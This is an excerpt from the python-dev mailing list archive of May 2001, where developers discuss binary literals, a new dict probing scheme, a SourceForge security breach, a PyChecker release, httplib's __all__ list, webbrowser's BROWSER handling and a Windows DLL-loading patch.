Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16}, and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1. > Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal at lemburg.com Thu May 31 09:20:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines.
In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 31 09:33:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. 
Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid us the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 10:43:32 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid us the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density, of, say 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the forseeable future -- remember power distribution and heat dissipation).
This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either. There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal at lemburg.com Thu May 31 11:23:52 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > forseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm. 
> Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon. > > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm users hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 12:31:07 2001 From: esr at thyrsus.com (Eric S.
Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > forseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64 the diameter of the memory sphere only drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max.
In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from peoples' individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people. (I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas at xs4all.net Thu May 31 12:45:33 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid use the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the historybooks as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
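Python's arbitrary-precision integers make it easy to recompute the magnitudes traded in this thread. The sketch below reruns them under the thread's own inputs. Each one is stated as an assumption in a comment: 2^20 words per cubic centimetre packed into a solid sphere, a 365.25-day year with an unsigned 64-bit seconds counter, the 12e9 * 100e12 storage estimate, and 1 TB (2^40 bytes) per person. The variable names are illustrative only.

```python
import math

# 2^64: the number of distinct 64-bit addresses (or counter values).
space = 2 ** 64
print(space, len(str(space)))  # 18446744073709551616 20

# Solid sphere holding 2^64 words at an assumed 2^20 words per cm^3.
volume_cm3 = space / 2 ** 20
radius_cm = (3 * volume_cm3 / (4 * math.pi)) ** (1 / 3)
print(f"sphere radius: {radius_cm / 100:.0f} m")

# Years until an unsigned 64-bit counter of seconds wraps (365.25-day year assumed).
seconds_per_year = 365.25 * 24 * 3600
print(f"wraps after {space / seconds_per_year:.2e} years")

# 100e12 bytes for each of 12e9 people, compared with 2^80 bytes.
world_bytes = 12e9 * 100e12
print(f"{world_bytes:.2e} bytes vs 2^80 = {2 ** 80:.2e}")

# Number of 2^40-byte (1 TB) allotments in a 64-bit byte address space.
people = 2 ** 64 // 2 ** 40
print(people)  # 16777216
```

With these inputs, 2^64 has twenty decimal digits (about 1.8 × 10^19). The sphere's radius comes out near 160 m, and a 64-bit seconds counter wraps after roughly 5.8 × 10^11 years. The figure of 1.2e24 bytes sits just under 2^80, and 2^64 / 2^40 = 2^24 = 16,777,216 allotments.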
From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks to everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know.
Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From beazley at cs.uchicago.edu Thu May 31 15:34:57 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions. 
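The distinction under discussion, between a for-loop's variable and a list comprehension's, can be seen directly in current Python 3 rather than the 2.1 interpreter in this thread. In Python 3, list comprehensions run in their own scope. Plain for-loops still bind their variable in the enclosing scope, so a search loop can read its index after `break`. The function names below are illustrative.

```python
def find_first_negative(values):
    """Classic search loop: the loop variable is still bound after break."""
    for i, v in enumerate(values):
        if v < 0:
            break
    else:
        return None  # loop finished without break: nothing found
    return i


def listcomp_does_not_leak():
    """In Python 3 the comprehension's `k` is local to the comprehension."""
    k = "outer"
    squares = [k * k for k in range(3)]
    return k, squares


def for_loop_rebinds():
    """A plain for-loop assigns to `k` in the enclosing scope."""
    k = "outer"
    for k in range(3):
        pass
    return k


print(find_first_negative([3, 1, -4, 1]))  # 2
print(listcomp_does_not_leak())            # ('outer', [0, 1, 4])
print(for_loop_rebinds())                  # 2
```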
There are too many cases where you use a loop variable after finishing a loop and I suspect that this would break a huge amount of code. For example: for i in r: ... if whatever: break print i Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip at pobox.com Thu May 31 20:02:51 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes: Robin> from httplib import * Robin> class Bongo(HTTPConnection): Robin> pass ... Robin> NameError: name 'HTTPConnection' is not defined It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as __all__ = ["HTTP"] I have changed that to __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", "HTTPException", "NotConnected", "UnknownProtocol", "UnknownTransferEncoding", "IllegalKeywordArgument", "UnimplementedFileMode", "IncompleteRead", "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader", "ResponseNotReady", "BadStatusLine", "error"] and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use from "httplib import *": import httplib class Bongo(httplib.HTTPConnection): pass Robin> Changing the * to HTTPConnection in ttt.py removes the problem. Yup, that will also work. 
Before anyone asks, "Who died and made Skip King?", the scenario as I recall it was that the semantics of __all__ got settled on during discussions on python-dev (the goal of __all__ being to minimize namespace pollution by "from ... *"), but nobody stepped up immediately to do the grunt work, so I volunteered. The problem in relying on one person (well, at least this one person) to do this was that I had only the following tools at my disposal to decide what belonged in __all__: * what was documented in the lib reference manual (which was at times incomplete) * my experience with the various modules (some of which was specialized, some of which was nonexistent) * the standard library (which generally doesn't use "from ... *" much) * input from python-dev (whose members also appear not to use "from ... *" very liberally) In retrospect, I probably should have polled c.l.py with a summary of what I came up with before the 2.1 ship date. If people would like me to do that now (before 2.2 gets anywhere close to release) to try and fill in as many missing symbols as possible, let me know. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From skip at pobox.com Thu May 31 20:06:01 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:06:01 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin Message-ID: <15126.34825.167026.520535@beluga.mojam.com> I just updated httplib.py to expand the list of names in its __all__ list. I was operating on version 1.34. After the checkin I am looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says "release21-maint". Did I muff it? If so, how should I do an unmuff operation?
Skip From robin at jessikat.fsnet.co.uk Thu May 31 20:33:02 2001 From: robin at jessikat.fsnet.co.uk (Robin Becker) Date: Thu, 31 May 2001 19:33:02 +0100 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com> References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro writes >>>>>> "Robin" == Robin Becker writes: > > Robin> from httplib import * > > Robin> class Bongo(HTTPConnection): > Robin> pass > ... > Robin> NameError: name 'HTTPConnection' is not defined > >It was a brain fart on my part when creating httplib.__all__. >HTTPConnection was not included in that list. I will check in a fix. >In the 2.1 release __all__ was defined as > > __all__ = ["HTTP"] > >I have changed that to > > __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", > "HTTPException", "NotConnected", "UnknownProtocol", > "UnknownTransferEncoding", "IllegalKeywordArgument", > "UnimplementedFileMode", "IncompleteRead", > "ImproperConnectionState", "CannotSendRequest", >"CannotSendHeader", > "ResponseNotReady", "BadStatusLine", "error"] thanks; I'm still a bit puzzled as to the exact semantics. It just looks wrong. Is __all__ the only way to get things into the * version of import? Presumably HTTPConnection is being marked as a potential global in the compile phase. -- Robin Becker From skip at pobox.com Thu May 31 21:27:12 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:27:12 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: <15126.39696.370516.926735@beluga.mojam.com> Robin> thanks; I'm still a bit puzzled as to the exact semantics. It Robin> just looks wrong. Is __all__ the only way to get things into the Robin> * version of import? Essentially, yes. 
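Here is a small, self-contained demonstration of how `__all__` restricts `from module import *`. To avoid touching the real `httplib`, it builds a throwaway module in memory. The module name `demo_http` and its classes are hypothetical stand-ins that mirror the 2.1 situation, where `__all__` listed only `"HTTP"`. Names in `__all__` are the only ones the star-import binds. An explicit `from demo_http import HTTPConnection` still works regardless.

```python
import sys
import types

# Build a stand-in module whose __all__ omits HTTPConnection.
mod = types.ModuleType("demo_http")
exec(
    "__all__ = ['HTTP']\n"
    "class HTTP: pass\n"
    "class HTTPConnection: pass\n",
    mod.__dict__,
)
sys.modules["demo_http"] = mod  # make it importable by name

star_ns = {}
exec("from demo_http import *", star_ns)
print("HTTP" in star_ns, "HTTPConnection" in star_ns)  # True False

explicit_ns = {}
exec("from demo_http import HTTPConnection", explicit_ns)
print("HTTPConnection" in explicit_ns)  # True

# Without __all__, the star-import takes every name not starting with "_".
del mod.__all__
star_ns = {}
exec("from demo_http import *", star_ns)
print("HTTPConnection" in star_ns)  # True
```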
If you want to just dispense with it __all__together (=:-o), you can textually replace __all__ with ___all__ in each of the standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
        sed -e 's/___*all__/___all__/g' < $f > $f.tmp
        mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib directory. Robin> Presumably HTTPConnection is being marked as a potential global Robin> in the compile phase. It has nothing to do with module compilation. The contents of __all__ are a static thing in the text of the .py file, and thus far almost entirely due to me studying the inputs at hand and making a decision about what belonged and what didn't. Some python-dev people caught omissions and added them before the 2.1 release. Other than that, the mistakes are all mine. I had some misgivings about the whole thing during the midst of the task and still do, but grumbled once and completed it. Skip From skip at pobox.com Thu May 31 21:57:21 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:57:21 -0500 Subject: [Python-Dev] weird webbrowser behavior Message-ID: <15126.41505.987887.477670@beluga.mojam.com> I'm using Gnome under Mandrake 8.0 and getting very strange results using webbrowser (indirectly via pydoc). Apparently, Gnome's init code sets the BROWSER environment variable to "nautilus" (much to my surprise) and webbrowser trusts it as the god's honest truth, even though nautilus has not been registered with the webbrowser module (am I supposed to add that sort of stuff to site.py?). Accordingly, _tryorder is ['nautilus'], but 'nautilus' doesn't appear in _browser.keys(), which is ['lynx', 'links', 'netscape', 'kfm', 'mozilla']. I think webbrowser should either ignore elements of BROWSER if they have not previously been registered (and can't be found by _iscommand) or try to register them using GenericBrowser.
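Skip's suggestion amounts to a filtering step over the entries in BROWSER. The sketch below is hypothetical and deliberately side-effect free. `resolve_browser_order` is an invented helper. `registered` stands in for the module's table of known browsers, and `shutil.which` stands in for the module's internal command lookup. The helper keeps entries that are already registered. It keeps unknown entries only when the command can be found on PATH, flagging them as candidates for a `GenericBrowser` handler, and it drops the rest.

```python
import os
import shutil


def resolve_browser_order(browser_env, registered, which=shutil.which):
    """Return (name, needs_registration) pairs for usable BROWSER entries.

    browser_env: raw value of $BROWSER, entries separated by os.pathsep.
    registered:  names of browsers that already have handlers.
    which:       command lookup; returns a path or None.
    """
    order = []
    for name in browser_env.split(os.pathsep):
        name = name.strip()
        if not name:
            continue
        if name in registered:
            order.append((name, False))  # known handler: use as-is
        elif which(name) is not None:
            order.append((name, True))   # on PATH: needs a generic handler
        # otherwise ignore the entry instead of trusting it blindly
    return order


known = {"lynx", "links", "netscape", "kfm", "mozilla"}
env = os.pathsep.join(["nautilus", "lynx"])
print(resolve_browser_order(env, known, which=lambda cmd: None))
# [('lynx', False)]
```

A flagged entry could then be passed to `webbrowser.register(name, None, webbrowser.GenericBrowser(name))`. That call is left out of the sketch so the function stays free of side effects and easy to test.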
Users are apparently not the only people setting BROWSER, so the comment in the code: # It's the user's responsibility to register handlers for any unknown # browser referenced by this value, before calling open(). seems like flawed logic to me. Skip From esr at thyrsus.com Thu May 31 22:08:21 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 16:08:21 -0400 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500 References: <15126.41505.987887.477670@beluga.mojam.com> Message-ID: <20010531160821.A10314@thyrsus.com> Skip Montanaro : > I think webbrowser should either ignore elements of BROWSER if > they have not previously been registered (and can't be found by _iscommand) > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: Fred Drake and I are co-responsible for that code. If you want to patch it to do this, I won't object. -- Eric S. Raymond "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, Historical Review of Pennsylvania, 1759. From fdrake at acm.org Thu May 31 22:18:26 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 16:18:26 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > I just updated httplib.py to expand the list of names in its __all__ list. > I was operating on version 1.34. After the checkin I am looking at version > 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says > "release21-maint". Did I muff it? If so, how should I do an unmuff > operation? 
If that's really a muff, revert the change: cd .../Lib/ cvs diff -r1.34.2.1 -r1.34 httplib.py | patch and commit the new version as 1.34.2.2: cvs commit -m 'unmuff...' httplib.py -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From skip at pobox.com Thu May 31 22:30:22 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:30:22 -0500 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <20010531160821.A10314@thyrsus.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.43486.320228.376505@beluga.mojam.com> Eric> Fred Drake and I are co-responsible for that code. If you want to Eric> patch it to do this, I won't object. Here's a first pass that seems to work for me: https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470 though it doesn't attempt to recover if _tryorder winds up empty. Skip From skip at pobox.com Thu May 31 22:48:40 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:48:40 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Message-ID: <15126.44584.300357.360209@beluga.mojam.com> >> I just updated httplib.py to expand the list of names in its __all__ >> list. I was operating on version 1.34. After the checkin I am >> looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my >> directory tree and says "release21-maint". Did I muff it? If so, >> how should I do an unmuff operation? Fred> If that's really a muff, revert the change: Fred> cd .../Lib/ Fred> cvs diff -r1.34.2.1 -r1.34 httplib.py | patch Fred> and commit the new version as 1.34.2.2: Fred> cvs commit -m 'unmuff...' 
httplib.py Functionally, the checkin isn't a muff (it does have the change I intended), but I was worried about the version number. Should I have checked it in as version 1.34.2.1 or 1.35? Skip From fdrake at acm.org Thu May 31 23:00:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:00:34 -0400 (EDT) Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: > > # It's the user's responsibility to register handlers for any unknown > # browser referenced by this value, before calling open(). > > seems like flawed logic to me. Eric S. Raymond writes: > Fred Drake and I are co-responsible for that code. If you want to patch it > to do this, I won't object. I wouldn't object either. I *do* object to the system setting that variable by default by either Mandrake or Gnome -- that's just stupid and inconsiderate of the user. Now, if anyone can provide support for Nautilis, I won't object to that either. Unfortunately, Mandrake's installer stinks at upgrading (it couldn't seem to locate my 7.2 installation) and I don't have the time to figure that out. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 31 23:04:30 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:04:30 -0400 (EDT) Subject: [Python-Dev] Damn... 
I think I might have just muffed a checkin In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> <15126.44584.300357.360209@beluga.mojam.com> Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > Functionally, the checkin isn't a muff (it does have the change I intended), > but I was worried about the version number. Should I have checked it in as > version 1.34.2.1 or 1.35? If the change should happen on the branch, leave it in. If it's also needed on the HEAD, check it in again there, and you're done. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From MarkH at ActiveState.com Tue May 1 02:42:19 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. 
Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. 
